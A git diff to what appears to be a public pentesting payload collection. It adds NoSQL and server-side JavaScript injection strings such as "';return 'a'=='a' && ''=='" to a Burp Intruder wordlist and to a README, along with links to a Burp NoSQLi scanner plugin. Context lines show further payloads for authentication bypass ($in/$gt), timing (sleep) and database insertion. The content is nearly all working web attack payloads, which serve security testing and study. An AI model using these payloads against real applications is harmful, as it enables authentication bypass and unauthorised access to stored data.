diff --git a/NoSQL Injection/Intruder/NoSQL.txt b/NoSQL Injection/Intruder/NoSQL.txt index c00e486..535cb4d 100644 --- a/NoSQL Injection/Intruder/NoSQL.txt +++ b/NoSQL Injection/Intruder/NoSQL.txt @@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi ';sleep(5000);' ';sleep(5000);+' ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); +';return 'a'=='a' && ''==' +";return(true);var xyz='a +0;return true \ No newline at end of file diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index a37eb71..857de97 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -19,6 +19,7 @@ * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) * [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) +* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner) ## Exploit @@ -70,6 +71,14 @@ Extract data with "in" {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} ``` +### SSJI + +```json +';return 'a'=='a' && ''==' +";return 'a'=='a' && ''==' +0;return true +``` + ## Blind NoSQL @@ -165,6 +174,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1 +';return 'a'=='a' && ''==' +";return(true);var xyz='a +0;return true ``` ## References @@ -173,3 +185,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) +* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) \ No newline at end of file